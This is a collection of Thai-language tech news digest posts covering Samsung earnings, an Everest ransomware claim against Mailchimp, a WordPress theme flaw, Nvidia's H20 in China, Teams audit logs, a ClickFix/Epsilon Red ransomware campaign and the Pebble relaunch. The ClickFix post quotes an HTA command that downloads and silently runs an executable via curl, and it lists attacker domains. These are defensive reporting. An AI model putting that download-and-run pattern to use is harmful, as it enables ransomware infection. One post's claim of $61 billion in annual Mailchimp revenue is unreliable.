🎙️ เรื่องเล่าจากข่าว: Samsung กับวิกฤติชิป—กำไรหายไป 94% แต่ยังมีความหวังจาก AI และ Tesla Samsung Electronics รายงานผลประกอบการไตรมาส 2 ปี 2025 โดยมีรายได้รวม 74.6 ล้านล้านวอน (ประมาณ 53.7 พันล้านดอลลาร์) ซึ่งเพิ่มขึ้นเล็กน้อยจากปีก่อน แต่สิ่งที่น่าตกใจคือ “กำไรจากธุรกิจชิป” ลดลงถึง 93.8% เหลือเพียง 400 พันล้านวอน จากเดิม 6.45 ล้านล้านวอนในปี 2024 สาเหตุหลักมาจากการส่งออกที่ชะลอตัว, การปรับมูลค่าสินค้าคงคลัง และข้อจำกัดจากมาตรการของสหรัฐฯ ที่ห้ามส่งออกชิปขั้นสูงไปยังจีน แม้สถานการณ์จะดูเลวร้าย แต่ Samsung ยังมีความหวังจากการผลิตชิป AI รุ่นใหม่ให้ Tesla มูลค่าสัญญา 16.5 พันล้านดอลลาร์ และการเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง ซึ่งอาจช่วยพลิกสถานการณ์ได้ ✅ Samsung รายงานกำไรจากธุรกิจชิปลดลง 93.8% ในไตรมาส 2 ปี 2025 ➡️ เหลือเพียง 400 พันล้านวอน จาก 6.45 ล้านล้านวอนในปีก่อน ➡️ เป็นผลประกอบการที่แย่ที่สุดในรอบ 6 ไตรมาส ✅ รายได้รวมของบริษัทอยู่ที่ 74.6 ล้านล้านวอน เพิ่มขึ้นเล็กน้อยจากปีก่อน ➡️ แต่กำไรจากการดำเนินงานลดลงเหลือ 4.7 ล้านล้านวอน ➡️ ธุรกิจมือถือยังทำกำไรได้ดี โดยเฉพาะ Galaxy S25 และ A series ✅ สาเหตุหลักของการตกต่ำคือการส่งออกชิปไปจีนถูกจำกัด และต้นทุนสูงจากโรงงานในสหรัฐฯ ➡️ โรงงานในเท็กซัสมีต้นทุนสูงกว่าที่เกาหลี ➡️ ยังไม่สามารถหาลูกค้าหลักได้สำหรับโรงงานใหม่ ✅ Samsung ได้สัญญาผลิตชิป AI6 ให้ Tesla มูลค่า 16.5 พันล้านดอลลาร์ ➡️ เป็นความหวังใหม่ของธุรกิจ foundry ➡️ หุ้น Samsung พุ่งขึ้นกว่า 20% ในเดือนกรกฎาคมหลังข่าวนี้ ✅ บริษัทเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง ➡️ คาดว่าจะช่วยเพิ่มรายได้ของธุรกิจ foundry ➡️ แข่งขันกับ TSMC และ SK Hynix อย่างเข้มข้น ✅ Samsung คาดการณ์ว่าธุรกิจจะฟื้นตัวในครึ่งปีหลัง โดยมีแรงหนุนจาก AI และหุ่นยนต์ ➡️ CFO ระบุว่าอุตสาหกรรม IT เริ่มฟื้นตัวจากแรงผลักดันของเทคโนโลยีใหม่ ➡️ คาดว่าจะมีการเติบโตต่อเนื่องถึงปี 2025 https://www.techspot.com/news/108897-samsung-posts-brutal-financials-chip-business-profits-plunge.html

🎙️ เรื่องเล่าจากข่าว: Everest Ransomware กับการโจมตี Mailchimp ที่กลายเป็นเรื่องตลกในวงการไซเบอร์ ปลายเดือนกรกฎาคม 2025 กลุ่ม Everest ransomware ได้โพสต์บนเว็บไซต์มืดว่า พวกเขาเจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลชื่อดัง—และขโมยข้อมูลขนาด 767 MB รวม 943,536 บรรทัด ซึ่งอ้างว่าเป็น “เอกสารภายในบริษัท” และ “ข้อมูลส่วนตัวของลูกค้า” แต่เมื่อผู้เชี่ยวชาญด้านความปลอดภัยได้ตรวจสอบตัวอย่างข้อมูล พบว่าเป็นเพียงข้อมูลธุรกิจทั่วไป เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เมือง, ประเทศ, ลิงก์โซเชียลมีเดีย และเทคโนโลยีที่ใช้ ไม่ใช่ข้อมูลลับหรือข้อมูลภายในที่สำคัญของ Mailchimp ชุมชนไซเบอร์จึงพากันหัวเราะเยาะการโจมตีครั้งนี้ โดยเปรียบเทียบว่า “เหมือนข้อมูลของลูกค้าคนเดียว” หรือ “แค่เศษเสี้ยวของข้อมูลที่ Mailchimp ส่งออกในหนึ่งวินาที” แม้จะดูเล็กน้อย แต่การโจมตีนี้ยังสะท้อนแนวโน้มที่น่ากังวล—การเพิ่มขึ้นของ ransomware ทั่วโลกในเดือนกรกฎาคม โดยมีหลายกลุ่มโจมตีองค์กรใหญ่ เช่น Dollar Tree, Albavision และ NASCAR ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 767 MB รวม 943,536 บรรทัด ➡️ อ้างว่าเป็นเอกสารภายในและข้อมูลลูกค้า ➡️ โพสต์บนเว็บไซต์มืดพร้อมตัวอย่างข้อมูล ✅ ข้อมูลที่หลุดเป็นข้อมูลธุรกิจทั่วไป ไม่ใช่ข้อมูลลับของ Mailchimp ➡️ เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ ดูเหมือนมาจากการ export จากระบบ CRM มากกว่าระบบภายใน ✅ ชุมชนผู้เชี่ยวชาญด้านไซเบอร์เยาะเย้ยการโจมตีครั้งนี้ว่า “เล็กเกินคาด” ➡️ เปรียบเทียบว่าเป็นข้อมูลของลูกค้าคนเดียว ➡️ คาดหวังว่าจะมีข้อมูลระดับ GB หรือ TB จากบริษัทใหญ่แบบ Mailchimp ✅ Everest ransomware เคยโจมตีบริษัทใหญ่มาแล้ว เช่น Coca-Cola และรัฐบาลในอเมริกาใต้ ➡️ ใช้โมเดล double extortion: เข้ารหัสไฟล์ + ขู่เปิดเผยข้อมูล ➡️ ล่าสุดเริ่มขายสิทธิ์เข้าถึงระบบให้กลุ่มอื่นแทนการโจมตีเอง ✅ การโจมตี Mailchimp เป็นส่วนหนึ่งของคลื่น ransomware ที่พุ่งสูงในเดือนกรกฎาคม 2025 ➡️ INC ransomware อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP โจมตี Albavision ได้ข้อมูล 400 GB ➡️ Medusa ransomware เรียกค่าไถ่ NASCAR มูลค่า $4 ล้าน https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

ไทม์ไลน์ปะทะเดือด ชายแดนไทย-กัมพูชา ตั้งแต่ 24 กรกฎาคม จนถึงวันนี้ ที่ผืนแผ่นดินไทยจะยังคงอยู่ตลอดไปจนชั่วลูกชั่วหลาน #Sondhi #Sondhitalk #สนธิ #สนธิลิ้มทองกุล #ไทยเขมร #ปะทะเดือด #จับประเด็น #ไทม์ไลน์ปะทะเดือดชายแดนไทย #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #CambodianDeception #Thaitimes #กัมพูชายิงก่อน #เขมรละเมิดหยุดยิง #ความจริงจากไทย #News1 #Shorts

🎙️ เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ: - สร้างบัญชีแอดมินปลอม - อัปโหลดมัลแวร์ - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น ✅ ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ➡️ คะแนนความรุนแรง 9.8/10 ➡️ เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล ✅ ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ➡️ เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป ➡️ ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว ➡️ เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025 ➡️ ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip ✅ แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ ➡️ ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย ➡️ อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน ✅ ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก ➡️ มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery ➡️ เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร ‼️ หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที ⛔ ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน ⛔ อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้ ‼️ การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ ⛔ แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด ⛔ อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก ‼️ ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน ⛔ เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins ⛔ ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด ‼️ การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก ⛔ ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่ ⛔ ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected

🧠 เรื่องเล่าจากข่าว: “H20 ของ Nvidia” กลายเป็นจุดชนวนใหม่ในสงครามเทคโนโลยีระหว่างจีนกับสหรัฐ หลังจากสหรัฐฯ ยกเลิกคำสั่งห้ามส่งออกชิป H20 ของ Nvidia ไปยังจีนเมื่อเดือนกรกฎาคม 2025 ซึ่งก่อนหน้านั้นเคยถูกแบนในเดือนเมษายนเนื่องจากข้อกังวลด้านความมั่นคง ล่าสุด Cyberspace Administration of China (CAC) ได้เรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับ “ความเสี่ยงด้านความปลอดภัย” ของชิป H20 ที่กำลังจะกลับมาวางขายในจีน CAC อ้างว่าได้รับข้อมูลจากผู้เชี่ยวชาญด้าน AI ของสหรัฐฯ ว่าชิป H20 อาจมีฟีเจอร์ “ติดตามตำแหน่ง” และ “ปิดการทำงานจากระยะไกล” ซึ่งอาจกระทบต่อความเป็นส่วนตัวของผู้ใช้ชาวจีน และละเมิดกฎหมายความปลอดภัยไซเบอร์ของประเทศ ด้าน Nvidia ยืนยันว่า “ไม่มี backdoor” ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์อย่างสูงสุด พร้อมเตรียมส่งเอกสารชี้แจงตามคำขอของ CAC ขณะเดียวกัน นักการเมืองสหรัฐฯ ก็เคยเสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ เพื่อป้องกันการลักลอบนำไปใช้ในทางที่ผิด โดยเฉพาะในจีน ซึ่งอาจนำไปใช้พัฒนา AI ทางทหารหรือระบบเซ็นเซอร์ตรวจสอบประชาชน ✅ จีนเรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับความเสี่ยงด้านความปลอดภัยของชิป H20 ➡️ CAC ต้องการเอกสารสนับสนุนเกี่ยวกับความเสี่ยงด้าน backdoor และการติดตาม ➡️ อ้างอิงจากรายงานของผู้เชี่ยวชาญ AI สหรัฐฯ ✅ ชิป H20 ถูกพัฒนาขึ้นเพื่อให้ผ่านข้อจำกัดการส่งออกของสหรัฐฯ โดยมีประสิทธิภาพต่ำกว่าชิป H100 ➡️ ถูกแบนในเดือนเมษายน 2025 และกลับมาขายได้ในเดือนกรกฎาคม ➡️ Nvidia สั่งผลิตเพิ่มอีก 300,000 ตัวจาก TSMC เพื่อรองรับความต้องการในจีน ✅ Nvidia ยืนยันว่าไม่มี backdoor ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์ ➡️ “ไม่มีช่องทางลับในการควบคุมหรือเข้าถึงจากระยะไกล” ➡️ พร้อมส่งเอกสารชี้แจงตามคำขอของ CAC ✅ นักการเมืองสหรัฐฯ เสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ ➡️ เช่น Chip Security Act ที่เสนอให้มีระบบตรวจสอบตำแหน่งและการใช้งาน ➡️ ยังไม่มีการผ่านเป็นกฎหมายอย่างเป็นทางการ ✅ จีนยังคงต้องพึ่งพาชิปของ Nvidia สำหรับงานวิจัยและการพัฒนา AI ภายในประเทศ ➡️ แม้จะมีการผลักดันชิปภายในประเทศ เช่น Huawei 910C ➡️ แต่ยังไม่สามารถทดแทน Nvidia ได้ในหลายด้าน https://www.techspot.com/news/108886-china-summons-nvidia-over-potential-security-concerns-h20.html

🧠 เรื่องเล่าจากข่าว: “ดูว่าใครแชร์อะไร กับใคร เมื่อไหร่”—Microsoft Teams เปิดให้ตรวจสอบการแชร์หน้าจอแล้ว ในเดือนกรกฎาคม 2025 Microsoft ได้เปิดตัวฟีเจอร์ใหม่ใน Microsoft Teams ที่ให้ผู้ดูแลระบบ (Teams admins) เข้าถึงข้อมูล telemetry และ audit logs สำหรับการแชร์หน้าจอ (screen sharing) และการควบคุมหน้าจอ (Take/Give/Request control) ได้โดยตรงผ่าน Microsoft Purview ข้อมูลที่สามารถตรวจสอบได้ ได้แก่: - ใครเริ่มแชร์หน้าจอ และเมื่อไหร่ - แชร์ให้ใครดู - ใครขอควบคุมหน้าจอ และใครอนุญาต - เวลาเริ่มและหยุดการแชร์ - การยอมรับคำขอควบคุมหน้าจอ ฟีเจอร์นี้ช่วยให้ผู้ดูแลระบบสามารถตรวจสอบพฤติกรรมต้องสงสัย เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก หรือการเข้าควบคุมหน้าจอโดยไม่ได้รับอนุญาต การใช้งานทำได้ผ่าน Microsoft Purview โดยเลือกเมนู Audit → New Search แล้วกรอกคำค้น เช่น “screenShared” หรือ “MeetingParticipantDetail” เพื่อดูข้อมูลย้อนหลัง และสามารถ export เป็นไฟล์ CSV ได้ ✅ Microsoft เปิดให้ Teams admins เข้าถึง audit logs สำหรับการแชร์หน้าจอผ่าน Microsoft Purview ➡️ ตรวจสอบได้ว่าใครแชร์หน้าจอ, แชร์ให้ใคร, และเมื่อไหร่ ➡️ รองรับการตรวจสอบคำสั่ง Take, Give, Request control ✅ ข้อมูล telemetry ช่วยให้ตรวจสอบพฤติกรรมต้องสงสัยได้แบบละเอียด ➡️ เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก ➡️ หรือการควบคุมหน้าจอโดยไม่ได้รับอนุญาต ✅ การใช้งานทำผ่าน Microsoft Purview โดยเลือก Audit → New Search ➡️ ใช้คำค้น “screenShared” หรือ “MeetingParticipantDetail” ➡️ สามารถ export ข้อมูลเป็น CSV ได้ ✅ ฟีเจอร์นี้เปิดให้ใช้งานแล้วสำหรับผู้ดูแลระบบทุกคน ➡️ ไม่จำกัดเฉพาะองค์กรขนาดใหญ่ ➡️ ใช้ได้ทั้งใน Teams เวอร์ชัน desktop, web และ mobile ✅ Microsoft Purview เป็นแพลตฟอร์มรวมสำหรับการจัดการความปลอดภัยของข้อมูล ➡️ รองรับการตรวจสอบ, ป้องกันการรั่วไหล, และการเข้ารหัสข้อมูล ➡️ ใช้ร่วมกับ Microsoft 365, Edge, Windows/macOS และเครือข่าย HTTPS ✅ ฟีเจอร์ “Detect sensitive content during screen sharing” ช่วยแจ้งเตือนเมื่อมีข้อมูลลับปรากฏบนหน้าจอ ➡️ เช่น หมายเลขบัตรเครดิต, เลขประจำตัวประชาชน, หรือข้อมูลภาษี ➡️ ผู้ใช้จะได้รับแจ้งเตือนและสามารถหยุดการแชร์ได้ทันที ✅ Microsoft Purview รองรับการป้องกันข้อมูลด้วย sensitivity labels และ Double Key Encryption ➡️ ช่วยให้ข้อมูลถูกเข้ารหัสและควบคุมการเข้าถึงได้ตามระดับความลับ ➡️ เหมาะกับองค์กรที่ต้องการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและกฎหมาย ‼️ การเปิดเผยข้อมูล telemetry อาจถูกนำไปใช้ผิดวัตถุประสงค์ได้ หากไม่มีการควบคุมสิทธิ์อย่างเหมาะสม ⛔ ผู้ดูแลระบบที่ไม่มีจรรยาบรรณอาจใช้ข้อมูลเพื่อสอดแนมหรือกดดันพนักงาน ⛔ ควรมีการกำหนดสิทธิ์และนโยบายการเข้าถึงอย่างชัดเจน ‼️ การแชร์หน้าจอโดยไม่ระวังอาจทำให้ข้อมูลลับรั่วไหลได้ง่าย ⛔ เช่น การเปิดเอกสารภายในหรือข้อมูลลูกค้าระหว่างประชุมกับบุคคลภายนอก ⛔ ควรมีการแจ้งเตือนหรือระบบตรวจจับเนื้อหาลับระหว่างการแชร์ ‼️ การใช้ฟีเจอร์นี้ต้องเปิด auditing ใน Microsoft Purview ก่อน ⛔ หากไม่ได้เปิด auditing จะไม่สามารถดูข้อมูลย้อนหลังได้ ⛔ ข้อมูลจะถูกเก็บตั้งแต่วันที่เปิด auditing เท่านั้น ‼️ การตรวจสอบข้อมูลย้อนหลังมีข้อจำกัดตามระดับ license ของ Microsoft 365 ⛔ ระยะเวลาการเก็บข้อมูล audit log ขึ้นอยู่กับประเภท license ⛔ ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงข้อมูลย้อนหลังได้ครบถ้วน https://www.neowin.net/news/teams-admins-will-now-be-able-to-see-telemetry-for-screen-sharing/

🧠 เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ) แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ ➡️ ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web ➡️ ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp ✅ ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting ➡️ จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า ✅ Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล ➡️ เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน ➡️ ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ ✅ Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021 ➡️ มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3 ➡️ การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น ✅ ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา ➡️ INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP เจาะ Albavisión ได้ 400 GB ➡️ Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/

⌚ เรื่องเล่าจากข้อมืออดีต: Pebble กลับมาแล้ว พร้อมระบบเปิดและแบตเตอรี่ 30 วัน หลังจากหายไปเกือบ 10 ปี Eric Migicovsky ผู้ก่อตั้ง Pebble ได้เปิดตัวบริษัทใหม่ชื่อ Core Devices และประกาศว่าเขาได้ “ซื้อคืน” เครื่องหมายการค้า Pebble เพื่อใช้กับนาฬิกาอัจฉริยะรุ่นใหม่ที่พัฒนาบนระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส นาฬิกาใหม่สองรุ่นคือ: - Pebble 2 Duo (เดิมชื่อ Core 2 Duo): หน้าจอขาวดำ e-paper ขนาด 1.26 นิ้ว, กันน้ำระดับ IPX8, มีไมค์และลำโพง, เซ็นเซอร์วัดความสูงและทิศทาง, แบตเตอรี่ใช้งานได้ 30 วัน - Pebble Time 2 (เดิมชื่อ Core Time 2): หน้าจอสี e-paper ขนาด 1.5 นิ้วแบบสัมผัส, ดีไซน์โลหะ, มีเซ็นเซอร์วัดหัวใจ, ไมค์และลำโพง, แบตเตอรี่ 30 วันเช่นกัน ทั้งสองรุ่นรองรับแอปและหน้าปัดกว่า 10,000 รายการจาก PebbleOS เดิม และสามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้ด้วยซอฟต์แวร์โอเพ่นซอร์ส Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 (ล่าช้าจากกำหนดเดิมในเดือนกรกฎาคม) ส่วน Pebble Time 2 ยังอยู่ในขั้นตอนทดสอบ EVT และคาดว่าจะจัดส่งปลายปีนี้ ✅ Pebble กลับมาอีกครั้งในปี 2025 โดยใช้ชื่อเดิมและระบบเดิม ➡️ Eric Migicovsky ซื้อคืนเครื่องหมายการค้า Pebble ➡️ เปิดตัวผ่านบริษัทใหม่ชื่อ Core Devices ✅ เปิดตัวนาฬิกาใหม่ 2 รุ่น: Pebble 2 Duo และ Pebble Time 2 ➡️ Pebble 2 Duo ราคา $149 พร้อมแบตเตอรี่ 30 วัน ➡️ Pebble Time 2 ราคา $225 พร้อมหน้าจอสัมผัสและดีไซน์โลหะ ✅ ใช้ระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส ➡️ รองรับแอปและหน้าปัดกว่า 10,000 รายการ ➡️ ผู้ใช้สามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้เอง ✅ Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 ➡️ ล่าช้าจากกำหนดเดิมเพราะทดสอบระบบกันน้ำและลำโพง ➡️ มี Bluetooth range ประมาณ 140 เมตรในพื้นที่เปิด ✅ Pebble Time 2 ยังอยู่ในขั้นตอน EVT และยังไม่มีกำหนดจัดส่ง ➡️ ปรับดีไซน์ให้บางลงและดูทันสมัยขึ้น ➡️ เพิ่มหน้าจอสัมผัสและเซ็นเซอร์วัดหัวใจ ✅ สามารถสั่งจองล่วงหน้าได้ผ่านเว็บไซต์ rePebble ➡️ มีให้เลือกสีขาวและดำ 